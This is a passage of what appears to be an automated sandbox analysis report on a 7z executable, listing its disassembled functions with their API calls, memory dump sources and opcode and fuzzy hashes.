                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: CreateFile$CloseHandlefree
                              • String ID:
                              • API String ID: 210839660-0
                              • Opcode ID: 1af0fe19b8f36ceeec8826d48cab967aca2ab12d8a160945025a9147185218b0
                              • Instruction ID: cf8ece77d9fd61f319b52186073b5167adb6cd9033d2aced5fe880b74aa38b8e
                              • Opcode Fuzzy Hash: 1af0fe19b8f36ceeec8826d48cab967aca2ab12d8a160945025a9147185218b0
                              • Instruction Fuzzy Hash: 602162336046819AC7709F15B84165A7764B3867F4F548322EFB9076D4DB38C995D701
                              Function 00FC29A8 Relevance: 4.6, APIs: 3, Instructions: 70COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00F735B8: memmove.MSVCRT ref: 00F735F0
                              • fputs.MSVCRT ref: 00FC29ED
                              • fputs.MSVCRT ref: 00FC2A7B
                              • free.MSVCRT ref: 00FC2AAB
                                • Part of subcall function 00F724C4: fputc.MSVCRT ref: 00F724D5
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputs$fputcfreememmove
                              • String ID:
                              • API String ID: 1158454270-0
                              • Opcode ID: 0aa009b6e2cbfff5aa000a93f38d3e144da14134328906fe9d9270d50c71e597
                              • Instruction ID: a8e1e454944da92fd85eea0e0a4ac67a0cff1af448af12d9233aac3c91117447
                              • Opcode Fuzzy Hash: 0aa009b6e2cbfff5aa000a93f38d3e144da14134328906fe9d9270d50c71e597
                              • Instruction Fuzzy Hash: 1E21515260470281CF74EF1AE81236A7361EB84BE4F489123E95E477A9DE2CC581E701
                              Function 00F796F8 Relevance: 4.5, APIs: 3, Instructions: 48COMMON
                              Download Yara Rule
                              APIs
                              • SetFilePointer.KERNELBASE(00000003,00000000,00000000,?,00F79BD5), ref: 00F79736
                              • GetLastError.KERNEL32 ref: 00F79743
                              • SetLastError.KERNEL32 ref: 00F7975C
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: ErrorLast$FilePointer
                              • String ID:
                              • API String ID: 1156039329-0
                              • Opcode ID: f50b3b5956e4207cef3ae29d8347eb7a38ec24be7dbd0c56f2053341d10d5ebe
                              • Instruction ID: e978130b2b2b781097f9cca8bea335b0c1afea5d98f8ffc6827a92b4d5dee27e
                              • Opcode Fuzzy Hash: f50b3b5956e4207cef3ae29d8347eb7a38ec24be7dbd0c56f2053341d10d5ebe
                              • Instruction Fuzzy Hash: 71012466F2568486EF248F7AA80436863629B58BF5F58C132CE0907B50DEA8C883E701
                              Function 00F72790 Relevance: 4.5, APIs: 3, Instructions: 31COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$fputsmemmove
                              • String ID:
                              • API String ID: 4106585527-0
                              • Opcode ID: 23fb8626e5c083572e28144598607edd5a0ad35f97957df7a3c39277dd8c4639
                              • Instruction ID: 627a54d68ffacb63b550740522fe819878f6de7db29f40ab5edf44631764a9b3
                              • Opcode Fuzzy Hash: 23fb8626e5c083572e28144598607edd5a0ad35f97957df7a3c39277dd8c4639
                              • Instruction Fuzzy Hash: 76F0BB1220498451CE60DB25ED4015E7321EBC5BF4F845323BA6E47BB9CF2CC555C700
                              Function 00F726D8 Relevance: 4.5, APIs: 3, Instructions: 29COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$fputsmemmove
                              • String ID:
                              • API String ID: 4106585527-0
                              • Opcode ID: 615417141882d484608d01c49fd5f9f5563eb28e4721ab9f04b0de3293a9f672
                              • Instruction ID: 1da4deb59ba05270bf380c2e6f089cba9f03135ba4e43471d7831f441c54ed92
                              • Opcode Fuzzy Hash: 615417141882d484608d01c49fd5f9f5563eb28e4721ab9f04b0de3293a9f672
                              • Instruction Fuzzy Hash: AFF03662204A4591CE60EB21E85115E7721E7C5BF4F446313B5AF476B9CE2CC545D701
                              Function 00F7F148 Relevance: 3.9, APIs: 3, Instructions: 178COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: ErrorLast$memmove
                              • String ID:
                              • API String ID: 3796167841-0
                              • Opcode ID: 7e677ca5909d1abcf7487877d2748dc86e450147a03828933a66653d50f1b6dc
                              • Instruction ID: 72c5a7fb53f1c95cb935e6415e1b4dd713b328a08960abc8eca139adaa3fd965
                              • Opcode Fuzzy Hash: 7e677ca5909d1abcf7487877d2748dc86e450147a03828933a66653d50f1b6dc
                              • Instruction Fuzzy Hash: 4D519F27B14B55A7DB68CE39DA407B92390FB047A4F54853B9F0E87B40DB38D869E342
                              Function 00F74040 Relevance: 3.9, APIs: 3, Instructions: 116COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 787d5f6136d305dd4f3df356df80b157353783f5c19ae3d327a6ecfb383bbb98
                              • Instruction ID: f74197cc3c00be09ca239b93f7f3289d324017492ee995ae26d00fc798e5bfe1
                              • Opcode Fuzzy Hash: 787d5f6136d305dd4f3df356df80b157353783f5c19ae3d327a6ecfb383bbb98
                              • Instruction Fuzzy Hash: 7041E83371569096CB24EF15E88056DB361F388BA0F488236EFAE47754DB7CD991DB02
                              Function 00F8CF90 Relevance: 3.8, APIs: 3, Instructions: 68COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: aed28ef6ba745056bcda24ea4d902b9f81d89b86785dc90adf63accb6bb7f7ce
                              • Instruction ID: 8b0a576d5c937f3fc1c93793909076c083790605249a788ce9ead4acb92c2457
                              • Opcode Fuzzy Hash: aed28ef6ba745056bcda24ea4d902b9f81d89b86785dc90adf63accb6bb7f7ce
                              • Instruction Fuzzy Hash: A3219FA37006809ADB60EF39D85039D3B50EB45BF8F584226EE2C0B7D9DB39C5469351
                              Function 00F724C4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputc
                              • String ID: Kernel
                              • API String ID: 1992160199-1736990243
                              • Opcode ID: ac98a9b7465604b7535c7a7ef0938ac82fa11a4959d8ec2f11bc57e26ce40c2f
                              • Instruction ID: 4a0d590d509e1c470c7adcd596c6c5ee9ccfaa7ff3e5c9f60608861f5299b82e
                              • Opcode Fuzzy Hash: ac98a9b7465604b7535c7a7ef0938ac82fa11a4959d8ec2f11bc57e26ce40c2f
                              • Instruction Fuzzy Hash: 72C09B5575050883EF1417B7F4453391212D75DF95F185031DE1D073508D1CD4D69711
                              Function 00FCB4D0 Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                              Download Yara Rule
                              APIs
                              • memset.MSVCRT ref: 00FCB515
                              • fputs.MSVCRT ref: 00FCB53A
                                • Part of subcall function 00F72C70: _CxxThrowException.MSVCRT ref: 00F72C99
                                • Part of subcall function 00F72C70: free.MSVCRT ref: 00F72CB1
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: ExceptionThrowfputsfreememset
                              • String ID:
                              • API String ID: 3104931167-0
                              • Opcode ID: 7dff0b48a21762c0c8d1a040b5640c1ee2e5c9c4bf4e68f1b691e4430e0ff499
                              • Instruction ID: 7baf84891a27862b84907f739c87c65fea2bcb6c6df290ccb6b45f9502a912c4
                              • Opcode Fuzzy Hash: 7dff0b48a21762c0c8d1a040b5640c1ee2e5c9c4bf4e68f1b691e4430e0ff499
                              • Instruction Fuzzy Hash: 0101AD77B006819BE705DF6ADA82B5E3B24F759BA4F488426CF4807705DB34D8AAC320
                              Function 00FC01FC Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputcfputsfree
                              • String ID:
                              • API String ID: 2822829076-0
                              • Opcode ID: 7a9fbc9a6f4ff3b967309d73c3494e18340ea5f6bd74a60e34c5b3131c678c6a
                              • Instruction ID: 427c51fb176130720764e6b6795cb78b3c9fd0f95caaa0f168ba980e3c45006d
                              • Opcode Fuzzy Hash: 7a9fbc9a6f4ff3b967309d73c3494e18340ea5f6bd74a60e34c5b3131c678c6a
                              • Instruction Fuzzy Hash: 74F08C63600A4581CA70EB25ED5975EA321E7C8BF8F488322AE6D477E9DE2CC586C700
                              Function 00FB339A Relevance: 2.6, APIs: 2, Instructions: 95COMMON
                              Download Yara Rule
                              APIs
                              • memmove.MSVCRT ref: 00FB33B2
                              • memmove.MSVCRT ref: 00FB33EC
                                • Part of subcall function 00F73798: free.MSVCRT ref: 00F737C4
                                • Part of subcall function 00F73798: memmove.MSVCRT ref: 00F737DF
                                • Part of subcall function 00FB5A44: _CxxThrowException.MSVCRT ref: 00FB5A74
                                • Part of subcall function 00FB5A44: memmove.MSVCRT ref: 00FB5AAD
                                • Part of subcall function 00FB5A44: free.MSVCRT ref: 00FB5AB5
                                • Part of subcall function 00F72350: malloc.MSVCRT ref: 00F72360
                                • Part of subcall function 00F72350: _CxxThrowException.MSVCRT ref: 00F7237B
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: memmove$ExceptionThrowfree$malloc
                              • String ID:
                              • API String ID: 459785443-0
                              • Opcode ID: 76968a8f14db75837efced6930eed1efe0eea37cf67448a4417bbf950b095561
                              • Instruction ID: 6fb4f32a46514b71b6bf123d8e53d7840997aa2a2f445d4846f001c18f0d846e
                              • Opcode Fuzzy Hash: 76968a8f14db75837efced6930eed1efe0eea37cf67448a4417bbf950b095561
                              • Instruction Fuzzy Hash: D5419EB7209AC1A6CA31EF16E5A42DE7760F394740F404522C78947B19DF3CD66AEB00
                              Function 00FB33B9 Relevance: 2.6, APIs: 2, Instructions: 65COMMON
                              Download Yara Rule
                              APIs
                              • memmove.MSVCRT ref: 00FB33CA
                              • memmove.MSVCRT ref: 00FB33EC
                                • Part of subcall function 00F73798: free.MSVCRT ref: 00F737C4
                                • Part of subcall function 00F73798: memmove.MSVCRT ref: 00F737DF
                                • Part of subcall function 00FB5A44: _CxxThrowException.MSVCRT ref: 00FB5A74
                                • Part of subcall function 00FB5A44: memmove.MSVCRT ref: 00FB5AAD
                                • Part of subcall function 00FB5A44: free.MSVCRT ref: 00FB5AB5
                                • Part of subcall function 00F72350: malloc.MSVCRT ref: 00F72360
                                • Part of subcall function 00F72350: _CxxThrowException.MSVCRT ref: 00F7237B
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: memmove$ExceptionThrowfree$malloc
                              • String ID:
                              • API String ID: 459785443-0
                              • Opcode ID: 11cc541a7f051c3831011b69b5689f2b86fb0c726538828055f92d0aa674b168
                              • Instruction ID: 54d1edc67b5be123b118b8e967ac91555dabdce831d26b00119ae5e6040935e4
                              • Opcode Fuzzy Hash: 11cc541a7f051c3831011b69b5689f2b86fb0c726538828055f92d0aa674b168
                              • Instruction Fuzzy Hash: 8421DAB3204AC5E2CA31EB16E5952DE7310F381750F508526C79D47A55DF3CD69AEB00
                              Function 00FA841C Relevance: 2.5, APIs: 2, Instructions: 41COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: fb399b51651309d117b4786408329f972b9fb6fbc257598f9b8565205b3e11c6
                              • Instruction ID: 68fcf6b18f14a19101a6249e2b9e2243d2b93294db4c5856ccefe653cce56a17
                              • Opcode Fuzzy Hash: fb399b51651309d117b4786408329f972b9fb6fbc257598f9b8565205b3e11c6
                              • Instruction Fuzzy Hash: 6EF08163702B5587DA20EA26E84012D6710AB86FF5F088321DF6917BD4CF68C967C300
                              Function 00FC02DC Relevance: 2.5, APIs: 2, Instructions: 26COMMON
                              Download Yara Rule
                              APIs
                              • EnterCriticalSection.KERNEL32 ref: 00FC02F0
                              • LeaveCriticalSection.KERNEL32 ref: 00FC032C
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: CriticalSection$EnterLeave
                              • String ID:
                              • API String ID: 3168844106-0
                              • Opcode ID: ce1e1f6b3c3819e5f178e0698093e98e42b7e88c6899fe963bfb13deb1ee1eca
                              • Instruction ID: 963888b777a167851fba83fe984ed875bc91f1f2a7f34e1517ef7a1ff10edf2d
                              • Opcode Fuzzy Hash: ce1e1f6b3c3819e5f178e0698093e98e42b7e88c6899fe963bfb13deb1ee1eca
                              • Instruction Fuzzy Hash: 5CF08C66241A4BC2EB218F24EA857BC3330FB48B94F544235CE1D47A60DF288899E310
                              Function 00FC0284 Relevance: 2.5, APIs: 2, Instructions: 23COMMON
                              Download Yara Rule
                              APIs
                              • EnterCriticalSection.KERNEL32 ref: 00FC0298
                              • LeaveCriticalSection.KERNEL32 ref: 00FC02CC
                                • Part of subcall function 00FCB774: GetTickCount.KERNEL32 ref: 00FCB794
                                • Part of subcall function 00FCB774: strcmp.MSVCRT ref: 00FCB7DA
                                • Part of subcall function 00FCB774: wcscmp.MSVCRT ref: 00FCB7FA
                                • Part of subcall function 00FCB774: strcmp.MSVCRT ref: 00FCB862
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: CriticalSectionstrcmp$CountEnterLeaveTickwcscmp
                              • String ID:
                              • API String ID: 3267814326-0
                              • Opcode ID: 833732d14ef6c0506e1edc0579892d3c753ea11d7fa4a44d78749cf595f9ff9a
                              • Instruction ID: 3275af498770935ad2ad6f106ad527d67445dae3b02891b741b935f4711fac71
                              • Opcode Fuzzy Hash: 833732d14ef6c0506e1edc0579892d3c753ea11d7fa4a44d78749cf595f9ff9a
                              • Instruction Fuzzy Hash: 2AF06D65240A4BD2EB109F20EDC97BC2370FB49B95F844235CE1A56A50DF38848DE710
                              Function 00F72350 Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: ExceptionThrowmalloc
                              • String ID:
                              • API String ID: 2436765578-0
                              • Opcode ID: 761da570273301f57cb3c724173f51dde4d4af1ca4fe2fbc66553b6d42a3ddde
                              • Instruction ID: e80576dbc6d42b642ab19560fc2e1322e57643b55cc05c803c5cf1d8170020d9
                              • Opcode Fuzzy Hash: 761da570273301f57cb3c724173f51dde4d4af1ca4fe2fbc66553b6d42a3ddde
                              • Instruction Fuzzy Hash: 26D05E11B2778686EE88A710A5A27282350E754304F805439E94E02B14DA1DC14AD700
                              Function 00F8B64C Relevance: 1.7, APIs: 1, Instructions: 457COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00F7BE6C: VariantClear.OLEAUT32 ref: 00F7BE91
                              • free.MSVCRT ref: 00F8BBE1
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: ClearVariantfree
                              • String ID:
                              • API String ID: 1064583652-0
                              • Opcode ID: 76b4d2c4a1afcce3459ea70e00dd02e281554d3da1415d3bd68a28633409dc01
                              • Instruction ID: 19797413c112d47d60017d838d261a89a256f62ad02035dc162706b05a1f69b3
                              • Opcode Fuzzy Hash: 76b4d2c4a1afcce3459ea70e00dd02e281554d3da1415d3bd68a28633409dc01
                              • Instruction Fuzzy Hash: B0125733608BC086CB75EB25E4902EEB761F395B90F684116DBDB47B24DBB9D884E701
                              Function 00F88A08 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8e1cdfd6a4b5c65e5f858a886ff12511c44938c6720d31dbf4f1bc7184a9a63f
                              • Instruction ID: ba99844db198cfed76ab98d4ffcb9548dab0831a0faa976927c92284f637fe84
                              • Opcode Fuzzy Hash: 8e1cdfd6a4b5c65e5f858a886ff12511c44938c6720d31dbf4f1bc7184a9a63f
                              • Instruction Fuzzy Hash: 31515AB2605AC496C761DF29D8442DE3B62F385FD8FA84136DE8A4B719DF35C882D310
                              Function 00FA73C4 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: ByteString
                              • String ID:
                              • API String ID: 4236320881-0
                              • Opcode ID: 2c2e37631b715157dc41e9a515c137241c6488906a9e2a13e0927854e2735fe0
                              • Instruction ID: dbb3e65845955f571d600f80adf98c9276045d36f60f46bb1f0da40c2ba6c063
                              • Opcode Fuzzy Hash: 2c2e37631b715157dc41e9a515c137241c6488906a9e2a13e0927854e2735fe0
                              • Instruction Fuzzy Hash: EE11705371C781C1E3209B19AC40B6A6A64E7897A4F448221EF9A477D4EB3CCD85A715
                              Function 00F79F10 Relevance: 1.5, APIs: 1, Instructions: 41timeCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
